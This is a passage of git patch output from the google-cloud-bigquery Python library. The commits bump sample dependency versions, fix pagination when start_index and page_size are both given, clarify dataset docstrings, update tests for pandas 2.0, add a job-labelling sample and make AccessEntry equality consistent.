pytest-xdist==3.7.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 049e88237..5ff1c0c02 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -9,8 +9,9 @@ cligj==0.7.2 db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 -geopandas==1.0.1 -google-api-core==2.24.2 +geopandas===1.0.1; python_version <= '3.9' +geopandas==1.1.0; python_version >= '3.10' +google-api-core==2.25.0 google-auth==2.40.2 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 @@ -18,7 +19,7 @@ google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.71.0 +grpcio==1.72.1 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 @@ -38,6 +39,6 @@ rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' six==1.17.0 -typing-extensions==4.13.2 +typing-extensions==4.14.0 typing-inspect==0.9.0 urllib3==2.4.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 2ad35b418..4b9c515a7 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 2ad35b418..4b9c515a7 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 27eb7459a..c3feffb35 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -3,7 +3,7 @@ db-dtypes==1.4.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' -ipython==9.2.0; python_version >= '3.10' +ipython==9.3.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.3; python_version >= '3.10' pandas==2.2.3 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 767f71fb1..d311187ec 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 From 45643a2e20ce5d503118522dd195aeca00dec3bc Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Thu, 5 Jun 2025 11:01:02 -0700 Subject: [PATCH 127/202] fix: fix rows returned when both start_index and page_size are provided (#2181) * fix: fix total rows returned when both start_index and page_size are provided * use shallow copy and add comments * add docstring * add unit test * lint * add comment --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/client.py | 9 +++- google/cloud/bigquery/job/query.py | 8 ++++ google/cloud/bigquery/table.py | 11 ++++- tests/unit/job/test_query.py | 72 ++++++++++++++++++++++++++++++ 4 files changed, 97 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index bb4d80c73..811e9ef03 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -2045,6 +2045,7 @@ def _get_query_results( location: Optional[str] = None, timeout: TimeoutType = DEFAULT_TIMEOUT, page_size: int = 0, + start_index: Optional[int] = None, ) -> _QueryResults: """Get the query results object for a query job. @@ -2063,9 +2064,12 @@ def _get_query_results( before using ``retry``. If set, this connection timeout may be increased to a minimum value. This prevents retries on what would otherwise be a successful response. - page_size (int): + page_size (Optional[int]): Maximum number of rows in a single response. See maxResults in the jobs.getQueryResults REST API. + start_index (Optional[int]): + Zero-based index of the starting row. See startIndex in the + jobs.getQueryResults REST API. Returns: google.cloud.bigquery.query._QueryResults: @@ -2095,6 +2099,9 @@ def _get_query_results( if location is not None: extra_params["location"] = location + if start_index is not None: + extra_params["startIndex"] = start_index + path = "/projects/{}/queries/{}".format(project, job_id) # This call is typically made in a polling loop that checks whether the diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 954a46963..4d95f0e71 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1409,6 +1409,7 @@ def _reload_query_results( retry: "retries.Retry" = DEFAULT_RETRY, timeout: Optional[float] = None, page_size: int = 0, + start_index: Optional[int] = None, ): """Refresh the cached query results unless already cached and complete. @@ -1421,6 +1422,9 @@ def _reload_query_results( page_size (int): Maximum number of rows in a single response. See maxResults in the jobs.getQueryResults REST API. + start_index (Optional[int]): + Zero-based index of the starting row. See startIndex in the + jobs.getQueryResults REST API. """ # Optimization: avoid a call to jobs.getQueryResults if it's already # been fetched, e.g. from jobs.query first page of results. @@ -1468,6 +1472,7 @@ def _reload_query_results( location=self.location, timeout=transport_timeout, page_size=page_size, + start_index=start_index, ) def result( # type: ignore # (incompatible with supertype) @@ -1570,6 +1575,9 @@ def result( # type: ignore # (incompatible with supertype) if page_size is not None: reload_query_results_kwargs["page_size"] = page_size + if start_index is not None: + reload_query_results_kwargs["start_index"] = start_index + try: retry_do_query = getattr(self, "_retry_do_query", None) if retry_do_query is not None: diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 3ffd5ca56..861f806b4 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1987,12 +1987,19 @@ def _get_next_page_response(self): return response params = self._get_query_params() + + # If the user has provided page_size and start_index, we need to pass + # start_index for the first page, but for all subsequent pages, we + # should not pass start_index. We make a shallow copy of params and do + # not alter the original, so if the user iterates the results again, + # start_index is preserved. + params_copy = copy.copy(params) if self._page_size is not None: if self.page_number and "startIndex" in params: - del params["startIndex"] + del params_copy["startIndex"] return self.api_request( - method=self._HTTP_METHOD, path=self.path, query_params=params + method=self._HTTP_METHOD, path=self.path, query_params=params_copy ) @property diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 1df65279d..46b802aa3 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -1682,6 +1682,78 @@ def test_result_with_start_index(self): tabledata_list_request[1]["query_params"]["maxResults"], page_size ) + def test_result_with_start_index_multi_page(self): + # When there are multiple pages of response and the user has set + # start_index, we should supply start_index to the server in the first + # request. However, in the subsequent requests, we will pass only + # page_token but not start_index, because the server only allows one + # of them. + from google.cloud.bigquery.table import RowIterator + + query_resource = { + "jobComplete": True, + "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + "totalRows": "7", + } + + # Although the result has 7 rows, the response only returns 6, because + # start_index is 1. + tabledata_resource_1 = { + "totalRows": "7", + "pageToken": "page_token_1", + "rows": [ + {"f": [{"v": "abc"}]}, + {"f": [{"v": "def"}]}, + {"f": [{"v": "ghi"}]}, + ], + } + tabledata_resource_2 = { + "totalRows": "7", + "pageToken": None, + "rows": [ + {"f": [{"v": "jkl"}]}, + {"f": [{"v": "mno"}]}, + {"f": [{"v": "pqe"}]}, + ], + } + + connection = make_connection( + query_resource, tabledata_resource_1, tabledata_resource_2 + ) + client = _make_client(self.PROJECT, connection=connection) + resource = self._make_resource(ended=True) + job = self._get_target_class().from_api_repr(resource, client) + + start_index = 1 + page_size = 3 + + result = job.result(page_size=page_size, start_index=start_index) + + self.assertIsInstance(result, RowIterator) + self.assertEqual(result.total_rows, 7) + + rows = list(result) + + self.assertEqual(len(rows), 6) + self.assertEqual(len(connection.api_request.call_args_list), 3) + + # First call has both startIndex and maxResults. + tabledata_list_request_1 = connection.api_request.call_args_list[1] + self.assertEqual( + tabledata_list_request_1[1]["query_params"]["startIndex"], start_index + ) + self.assertEqual( + tabledata_list_request_1[1]["query_params"]["maxResults"], page_size + ) + + # Second call only has maxResults. + tabledata_list_request_2 = connection.api_request.call_args_list[2] + self.assertFalse("startIndex" in tabledata_list_request_2[1]["query_params"]) + self.assertEqual( + tabledata_list_request_2[1]["query_params"]["maxResults"], page_size + ) + def test_result_error(self): from google.cloud import exceptions From bd5aba8ba40c2f35fb672a68eed11d6baedb304f Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Thu, 5 Jun 2025 12:01:06 -0700 Subject: [PATCH 128/202] docs: Improve clarity of "Output Only" fields in Dataset class (#2201) fixes b/407210727 --- google/cloud/bigquery/dataset.py | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index f788275cd..ec4098511 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -574,6 +574,10 @@ class Dataset(object): A pointer to a dataset. If ``dataset_ref`` is a string, it must include both the project ID and the dataset ID, separated by ``.``. + + Note: + Fields marked as "Output Only" are populated by the server and will only be + available after calling :meth:`google.cloud.bigquery.client.Client.get_dataset`. """ _PROPERTY_TO_API_FIELD = { @@ -692,7 +696,7 @@ def access_entries(self, value): @property def created(self): - """Union[datetime.datetime, None]: Datetime at which the dataset was + """Union[datetime.datetime, None]: Output only. Datetime at which the dataset was created (:data:`None` until set from the server). """ creation_time = self._properties.get("creationTime") @@ -709,8 +713,8 @@ def dataset_id(self): @property def full_dataset_id(self): - """Union[str, None]: ID for the dataset resource (:data:`None` until - set from the server) + """Union[str, None]: Output only. ID for the dataset resource + (:data:`None` until set from the server). In the format ``project_id:dataset_id``. """ @@ -725,14 +729,14 @@ def reference(self): @property def etag(self): - """Union[str, None]: ETag for the dataset resource (:data:`None` until - set from the server). + """Union[str, None]: Output only. ETag for the dataset resource + (:data:`None` until set from the server). """ return self._properties.get("etag") @property def modified(self): - """Union[datetime.datetime, None]: Datetime at which the dataset was + """Union[datetime.datetime, None]: Output only. Datetime at which the dataset was last modified (:data:`None` until set from the server). """ modified_time = self._properties.get("lastModifiedTime") @@ -744,8 +748,8 @@ def modified(self): @property def self_link(self): - """Union[str, None]: URL for the dataset resource (:data:`None` until - set from the server). + """Union[str, None]: Output only. URL for the dataset resource + (:data:`None` until set from the server). """ return self._properties.get("selfLink") From 99493bfb0d6230b9a04583d2b9dc40bc84ffdc49 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 9 Jun 2025 12:31:37 -0400 Subject: [PATCH 129/202] test: remove pragma (#2212) * test: remove pragma * test: remove comment about pragma * updates to conditionals related to pandas 2.0+ tests --- google/cloud/bigquery/_pandas_helpers.py | 9 ++------- tests/unit/job/test_query_pandas.py | 12 +++++------- tests/unit/test_table_pandas.py | 14 ++++++-------- 3 files changed, 13 insertions(+), 22 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 10a5c59bb..2dab03a06 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -337,13 +337,8 @@ def types_mapper(arrow_data_type): ): return range_date_dtype - # TODO: this section does not have a test yet OR at least not one that is - # recognized by coverage, hence the pragma. See Issue: #2132 - elif ( - range_timestamp_dtype is not None - and arrow_data_type.equals( # pragma: NO COVER - range_timestamp_dtype.pyarrow_dtype - ) + elif range_timestamp_dtype is not None and arrow_data_type.equals( + range_timestamp_dtype.pyarrow_dtype ): return range_timestamp_dtype diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index d82f0dfe3..a6c59b158 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -647,12 +647,6 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): ) -# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 -# pragma added due to issues with coverage. -@pytest.mark.skipif( - pandas.__version__.startswith("2."), - reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", -) @pytest.mark.skipif(pyarrow is None, reason="Requires `pyarrow`") def test_to_dataframe_column_dtypes(): from google.cloud.bigquery.job import QueryJob as target_class @@ -704,7 +698,6 @@ def test_to_dataframe_column_dtypes(): exp_columns = [field["name"] for field in query_resource["schema"]["fields"]] assert list(df) == exp_columns # verify the column names - assert df.start_timestamp.dtype.name == "datetime64[ns, UTC]" assert df.seconds.dtype.name == "Int64" assert df.miles.dtype.name == "float64" assert df.km.dtype.name == "float16" @@ -712,6 +705,11 @@ def test_to_dataframe_column_dtypes(): assert df.complete.dtype.name == "boolean" assert df.date.dtype.name == "dbdate" + if pandas.__version__.startswith("2."): + assert df.start_timestamp.dtype.name == "datetime64[us, UTC]" + else: + assert df.start_timestamp.dtype.name == "datetime64[ns, UTC]" + def test_to_dataframe_column_date_dtypes(): from google.cloud.bigquery.job import QueryJob as target_class diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 43d64d77d..a4fa3fa39 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -34,12 +34,6 @@ def class_under_test(): return RowIterator -# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 -# pragma added due to issues with coverage. -@pytest.mark.skipif( - pandas.__version__.startswith("2."), - reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", -) def test_to_dataframe_nullable_scalars( monkeypatch, class_under_test ): # pragma: NO COVER @@ -113,14 +107,18 @@ def test_to_dataframe_nullable_scalars( assert df.dtypes["bool_col"].name == "boolean" assert df.dtypes["bytes_col"].name == "object" assert df.dtypes["date_col"].name == "dbdate" - assert df.dtypes["datetime_col"].name == "datetime64[ns]" assert df.dtypes["float64_col"].name == "float64" assert df.dtypes["int64_col"].name == "Int64" assert df.dtypes["numeric_col"].name == "object" assert df.dtypes["string_col"].name == "object" assert df.dtypes["time_col"].name == "dbtime" - assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]" assert df.dtypes["json_col"].name == "object" + if pandas.__version__.startswith("2."): + assert df.dtypes["datetime_col"].name == "datetime64[us]" + assert df.dtypes["timestamp_col"].name == "datetime64[us, UTC]" + else: + assert df.dtypes["datetime_col"].name == "datetime64[ns]" + assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]" # Check for expected values. assert df["bignumeric_col"][0] == decimal.Decimal("123.456789101112131415") From dc374b4e22de98850c54643a58bb9e80f865dcf7 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 9 Jun 2025 18:58:40 +0200 Subject: [PATCH 130/202] chore(deps): update all dependencies (#2211) Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5ff1c0c02..4ebff482d 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,19 +12,19 @@ geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.0; python_version >= '3.10' google-api-core==2.25.0 -google-auth==2.40.2 +google-auth==2.40.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.72.1 +grpcio==1.73.0 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.2.3 +pandas==2.3.0 proto-plus==1.26.1 pyarrow==20.0.0 pyasn1==0.6.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 960eb6db4..d2456fc5a 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -3,4 +3,4 @@ db-dtypes==1.4.3 google.cloud.bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 -pandas==2.2.3 +pandas==2.3.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c3feffb35..66409e49d 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -6,4 +6,4 @@ ipython===8.18.1; python_version == '3.9' ipython==9.3.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.3; python_version >= '3.10' -pandas==2.2.3 +pandas==2.3.0 From 5a0fbf5cca551626d3cb49f934369049450546c1 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 9 Jun 2025 20:53:46 +0200 Subject: [PATCH 131/202] chore(deps): update dependency requests to v2.32.4 (#2213) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 4ebff482d..75a196eeb 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -34,7 +34,7 @@ pyparsing==3.2.3 python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 -requests==2.32.3 +requests==2.32.4 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' From 96b067da092836f0d8e19d5df683a0e5680caee8 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 13 Jun 2025 19:49:19 +0200 Subject: [PATCH 132/202] chore(deps): update dependency google-api-core to v2.25.1 (#2215) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 75a196eeb..daaf67b9e 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -11,7 +11,7 @@ Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.0; python_version >= '3.10' -google-api-core==2.25.0 +google-api-core==2.25.1 google-auth==2.40.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 From 4fbb37595f0e148b7912f26ac8e48a996a6cbae6 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 20 Jun 2025 14:36:25 -0700 Subject: [PATCH 133/202] chore(deps): bump urllib3 from 2.4.0 to 2.5.0 in /samples/geography (#2220) Bumps [urllib3](https://github.com/urllib3/urllib3) from 2.4.0 to 2.5.0. - [Release notes](https://github.com/urllib3/urllib3/releases) - [Changelog](https://github.com/urllib3/urllib3/blob/main/CHANGES.rst) - [Commits](https://github.com/urllib3/urllib3/compare/2.4.0...2.5.0) --- updated-dependencies: - dependency-name: urllib3 dependency-version: 2.5.0 dependency-type: direct:production ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index daaf67b9e..379d682b4 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.1; python_version >= '3.10' six==1.17.0 typing-extensions==4.14.0 typing-inspect==0.9.0 -urllib3==2.4.0 +urllib3==2.5.0 From 6e70fe2c4c0bec6d6aeb16ab5a83b01746e8c64a Mon Sep 17 00:00:00 2001 From: "Leah E. Cole" <6719667+leahecole@users.noreply.github.com> Date: Mon, 23 Jun 2025 11:50:33 -0400 Subject: [PATCH 134/202] chore: add label job sample (#2219) * chore: add label job sample * lint * remove unnecessary api call * Apply suggestions from code review Co-authored-by: Chalmer Lowe --------- Co-authored-by: Chalmer Lowe --- samples/snippets/label_job.py | 36 ++++++++++++++++++++++++++++++ samples/snippets/label_job_test.py | 31 +++++++++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 samples/snippets/label_job.py create mode 100644 samples/snippets/label_job_test.py diff --git a/samples/snippets/label_job.py b/samples/snippets/label_job.py new file mode 100644 index 000000000..cfd06d189 --- /dev/null +++ b/samples/snippets/label_job.py @@ -0,0 +1,36 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + + +def label_job() -> None: + # [START bigquery_label_job] + from google.cloud import bigquery + + client = bigquery.Client() + + sql = """ + SELECT corpus + FROM `bigquery-public-data.samples.shakespeare` + GROUP BY corpus; + """ + labels = {"color": "green"} + + config = bigquery.QueryJobConfig() + config.labels = labels + location = "us" + job = client.query(sql, location=location, job_config=config) + job_id = job.job_id + + print(f"Added {job.labels} to {job_id}.") + # [END bigquery_label_job] diff --git a/samples/snippets/label_job_test.py b/samples/snippets/label_job_test.py new file mode 100644 index 000000000..0780db61a --- /dev/null +++ b/samples/snippets/label_job_test.py @@ -0,0 +1,31 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import typing + +import label_job # type: ignore + + +if typing.TYPE_CHECKING: + import pytest + + +def test_label_job( + capsys: "pytest.CaptureFixture[str]", +) -> None: + label_job.label_job() + + out, _ = capsys.readouterr() + assert "color" in out + assert "green" in out From cd2e1387c98e9df74ec85b1f3a3aba371d9ad7b8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ra=C3=BAl=20Cumplido?= Date: Mon, 23 Jun 2025 20:32:50 +0200 Subject: [PATCH 135/202] chore: update PyPI URL for official nightly pyarrow repository (#2223) Co-authored-by: Lingqing Gan --- noxfile.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/noxfile.py b/noxfile.py index 6807b7ee4..eb79c238d 100644 --- a/noxfile.py +++ b/noxfile.py @@ -408,10 +408,10 @@ def prerelease_deps(session): ) # PyArrow prerelease packages are published to an alternative PyPI host. - # https://arrow.apache.org/docs/python/install.html#installing-nightly-packages + # https://arrow.apache.org/docs/developers/python.html#installing-nightly-packages session.install( "--extra-index-url", - "https://pypi.fury.io/arrow-nightlies/", + "https://pypi.anaconda.org/scientific-python-nightly-wheels/simple", "--prefer-binary", "--pre", "--upgrade", From 7c9e7fde1d710641c27247fa5f5271c86a9be2b1 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 25 Jun 2025 19:08:09 +0200 Subject: [PATCH 136/202] chore(deps): update all dependencies (#2216) Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 2 +- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 4b9c515a7..b3046227c 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 824a1df4a..ee895a4f4 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 379d682b4..f8f79a970 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.4.26 +certifi==2025.6.15 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 4b9c515a7..b3046227c 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 4b9c515a7..b3046227c 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index d311187ec..d71018b3f 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.6.4 -pytest==8.4.0 +pytest==8.4.1 mock==5.2.0 pytest-xdist==3.7.0 From 4941de441cb32cabeb55ec0320f305fb62551155 Mon Sep 17 00:00:00 2001 From: Prabakar <86585391+drokeye@users.noreply.github.com> Date: Thu, 26 Jun 2025 23:28:53 +0530 Subject: [PATCH 137/202] fix: make AccessEntry equality consistent with from_api_repr (#2218) * fix: make AccessEntry equality consistent for view entity type * fix: make AccessEntry equality consistent for view entity type * fix: use json.dumps() for normalizaiton of entity_id * remove trailing whitespace and add test assertions * revert back to the original code * fix linting in `dataset.py` * fix linting in `test_dataset.py` --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/dataset.py | 17 +++++++- tests/unit/test_dataset.py | 67 ++++++++++++++++++++++++++++++++ 2 files changed, 82 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index ec4098511..878b77d41 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -17,6 +17,7 @@ from __future__ import absolute_import import copy +import json import typing from typing import Optional, List, Dict, Any, Union @@ -506,7 +507,20 @@ def entity_id(self) -> Optional[Union[Dict[str, Any], str]]: def __eq__(self, other): if not isinstance(other, AccessEntry): return NotImplemented - return self._key() == other._key() + return ( + self.role == other.role + and self.entity_type == other.entity_type + and self._normalize_entity_id(self.entity_id) + == self._normalize_entity_id(other.entity_id) + and self.condition == other.condition + ) + + @staticmethod + def _normalize_entity_id(value): + """Ensure consistent equality for dicts like 'view'.""" + if isinstance(value, dict): + return json.dumps(value, sort_keys=True) + return value def __ne__(self, other): return not self == other @@ -557,7 +571,6 @@ def from_api_repr(cls, resource: dict) -> "AccessEntry": google.cloud.bigquery.dataset.AccessEntry: Access entry parsed from ``resource``. """ - access_entry = cls() access_entry._properties = resource.copy() return access_entry diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 3fd2579af..604e5ed2e 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -1767,3 +1767,70 @@ def test__hash__with_minimal_inputs(self): description=None, ) assert hash(cond1) is not None + + def test_access_entry_view_equality(self): + from google.cloud import bigquery + + entry1 = bigquery.dataset.AccessEntry( + entity_type="view", + entity_id={ + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "my_table", + }, + ) + entry2 = bigquery.dataset.AccessEntry.from_api_repr( + { + "view": { + "projectId": "my_project", + "datasetId": "my_dataset", + "tableId": "my_table", + } + } + ) + + entry3 = bigquery.dataset.AccessEntry( + entity_type="routine", + entity_id={ + "projectId": "my_project", + "datasetId": "my_dataset", + "routineId": "my_routine", + }, + ) + + entry4 = bigquery.dataset.AccessEntry.from_api_repr( + { + "routine": { + "projectId": "my_project", + "datasetId": "my_dataset", + "routineId": "my_routine", + } + } + ) + + entry5 = bigquery.dataset.AccessEntry( + entity_type="dataset", + entity_id={ + "dataset": { + "projectId": "my_project", + "datasetId": "my_dataset", + }, + "target_types": "VIEWS", + }, + ) + + entry6 = bigquery.dataset.AccessEntry.from_api_repr( + { + "dataset": { + "dataset": { + "projectId": "my_project", + "datasetId": "my_dataset", + }, + "target_types": "VIEWS", + } + } + ) + + assert entry1 == entry2 + assert entry3 == entry4 + assert entry5 == entry6 From 37e4e0ed8e6ffba6584a37131f03cb77b4fcfe64 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 27 Jun 2025 21:00:19 +0200 Subject: [PATCH 138/202] chore(deps): update all dependencies (#2224) --- samples/geography/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index f8f79a970..68f6c1662 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -4,13 +4,13 @@ cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' click==8.2.1; python_version >= '3.10' -click-plugins==1.1.1 +click-plugins==1.1.1.2 cligj==0.7.2 db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' -geopandas==1.1.0; python_version >= '3.10' +geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 google-cloud-bigquery==3.34.0 @@ -19,7 +19,7 @@ google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 